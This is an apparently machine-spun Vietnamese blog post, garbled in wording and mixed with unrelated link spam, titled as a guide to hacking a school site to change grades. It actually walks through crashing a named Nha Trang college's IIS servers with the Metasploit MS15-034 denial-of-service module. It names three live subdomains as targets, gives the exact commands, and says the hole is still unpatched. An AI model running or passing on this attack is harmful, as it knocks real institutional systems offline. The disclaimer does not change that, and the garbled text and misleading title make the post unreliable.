Cách hack trang web nhà trường sửa điểm

Tôi vẫn haông xã sụp website ngôi trường Cao đẳng chuyên môn công nghệ Nha Trang như vậy nào?

Lỗ hổng của LỖ HỔNG CỦA CDKTCNNT.EDU.VN

Chào các bạn, mình là Rapper Tiến Đạt. Thực ra lỗ hổng này theo như được biết thì mình đã phân phát hiện nay từ thời điểm cách đó 1 mon trước.

You watching: Cách hack trang web nhà trường sửa điểm

Lưu ý: Đây sự thật chưa hẳn là bài viết lí giải nhằm mục tiêu mục tiêu tiêu hủy, nhưng đấy là nội dung bài viết nhằm mục tiêu mục tiêu học hành với nghiên cứu và phân tích. Mình sẽ không còn Chịu đựng trách nhiệm cho chúng ta bao gồm bất kể hành động phạm luật nào. Chớ lẩn thẩn nhưng hack web của cục công an nha hihi :))))

Ok, mỗi cá nhân từng nghề mà. Sau đây mình đã trình làng sơ về website của trường bản thân mang đến các bạn thấy nó như thế nào!

Đây là website tạo ra nhằm mục tiêu mục đích xem công bố, các buổi giao lưu của ngôi trường, coi điểm sinch viên,,, bla bla ,…

LÝ DO MÌNH HACK WEB TRƯỜNG

Tại sao bản thân bao gồm dự định haông xã web trường? Thực ra thì cách đó hình như … 6 mon trước, vô tình bản thân đăng nhập lệ web trường thì vô tình bản thân phạt hiện một hiện tượng kỳ lạ lạ! (Trần Dần? há há)

*

Đây là 1 ví dụ minc họa, nhưng các bạn bao gồm biết đây là gì hông? Đây chính là Home mang định của localhost trên windows server 2012, vì nó có hiện rõ ràng luôn luôn kìa. Có thể vô tình bản thân đăng nhtràn vào thì website trường đang bảo trì. Vậy là mình đã hiểu rõ website của trường sử dụng windows server 2012 :)))

ĐI TÌM LỖ HỔNG

OK vậy thì sao? Vậy nên thì website ngôi trường quản lý được thì phải có hệ thống của trường chứ sao nữa :)). Ban đầu mình đã nghiên cứu và phân tích, khám phá, coi diễn bầy về các lỗ hổng của trang web các sản phẩm rồi hầu như vật dụng không đâu. Thế rồi tình cờ bản thân lên mạng khám phá thì phân phát hiện windows VPS 2012 dính kèm một lỗ hổng bảo mật rất lớn, kia chính là lỗ hổng tất cả mã là MS15-034. Vào kiểm tra test thì chính xác luôn!

Mô tả: MS15-034 được vạc hiện tại vào khoảng thời gian năm ngoái. Đây là lỗ hổng của máy nhà IIS Windows. Ảnh tìm hiểu giao thức http.

See more: Nhập Danh Bạ Từ Gmail Vào Iphone, Làm Thế Nào Để Nhập Danh Bạ Từ Gmail Để Iphone

Cụ thể, tệp tin http.sys là file đựng thông số kỹ thuật cache của IIS. Kẻ tấn cùng đã lợi dụng gửi triển khai tinh chỉnh từ xa, Lúc gửi mang lại tệp tin này các lần dẫn mang lại server sẽ ảnh hưởng crash. Và lỗ hổng này đã có được microsoft vá thọ rồi nhá!

TÌM NHIỀU LỖI HƠN

Sau lúc vẫn biết lỗ hổng của website trường. Mình sẽ suy ra trang web này dính kèm lỗ hổng về bảo mật :))) mình triển khai exploit để đưa ra các website hơn, với thế là cả nguyên một bầy :))

Cụ thể, trên đây chính là 3 trang web của ngôi trường bám lỗ hổng

http://tkb.cdktcnnt.edu.vn/

http://sv.cdktcnnt.edu.vn/

http://gv.cdktcnnt.edu.vn/

Riêng trang chính thì không biến thành, nhưng bản thân vẫn thường xuyên nghiên cứu vì hoàn toàn có thể còn dính các lỗ hổng khác

TIẾN HÀNH TẤN CÔNG

Ok, đủ dài cái rồi, ta ban đầu thực hành nhé!Ở đây mình dùng Kali Linuxtrước hết bản thân msinh sống metasploit lên

Gõ lệnh

use auxiliary/dos/http/ms15_034_ulonglongaddẤn ENTER

Cách này các bạn chỉ câu hỏi chọn thương hiệu một trong những 3 website nhưng mà mình đã exploit được, giờ đồng hồ mình gõ sv.cdktcnnt.edu.vn nha

Ok các bạn gõ

SET RHOST sv.cdktcnnt.edu.vnấn ENTER nhằm chọn mục tiêu knhì thác

Sau đó chúng ta gõ lệnh run ấn ENTER là chạy

Xem thành quả

OK gói tin đã có được gửi cho server của trường với bị crash :))). Nếu chúng ta có tác dụng mang lại đoạn này thì tức thị bạn sẽ thành công xuất sắc.

See more: Cách Tạo Liên Kết Giữa Các Trang Trong Word Cực Đơn Giản, Cách Tạo Liên Kết Hyperlink Trong Văn Bản Word

Cùng vào trình chú tâm chạy thử thử

Sau một hồi loading, chuyển phiên mãi, thì lúc này nó đã bị Not Found :)))

Ủa, như vậy sau thời điểm bị tấn công, trang bị VPS của nhà ngôi trường đang bị có tác dụng sao?

Thì máy vi tính hệ thống sẽ ảnh hưởng screen xanh chđọng sao :))) Sẽ bị rephối lại. Mà bao gồm lúc tấn công nhiều lần nó treo luôn ấy :))

OK Vậy xong xuôi rồi ha, sau thời điểm bị tiến công thì hệ thống sẽ ảnh hưởng reset lại vào tất nhiên ta vẫn rất có thể vào website ngôi trường bình thường. Tuyệt đối chúng ta chớ nên dùng giải pháp này để đi tiêu hủy tín đồ khác.

LỜI KẾT

Hiện tại lỗ hổng này bên trên web trường vẫn không được vá. Bên quản trị mạng của trường vẫn không hề biết những gì về hiện tượng lạ kỳ lạ này. Mình sẽ vào trang contact của ngôi trường, báo lỗi cùng với quản trị viên của website với muốn gợi ý bọn họ cách fix, (tôi đã ẩn họ tên đi) tuy vậy vẫn chưa thấy ai thẳng vấn đáp bản thân qua email. Dự kiến tiếp theo sau là bản thân đã tìm một lỗ hổng bảo mật thông tin khác của website của một ngôi trường không giống, tiếp nối bản thân vẫn liên tục đăng bài lên. Cảm ơn chúng ta sẽ gọi. Hết rồi đó!

/* Mình hy vọng phần đông chúng ta sau khi gọi kết thúc bài viết này sẽ không còn biết được kín của bản thân */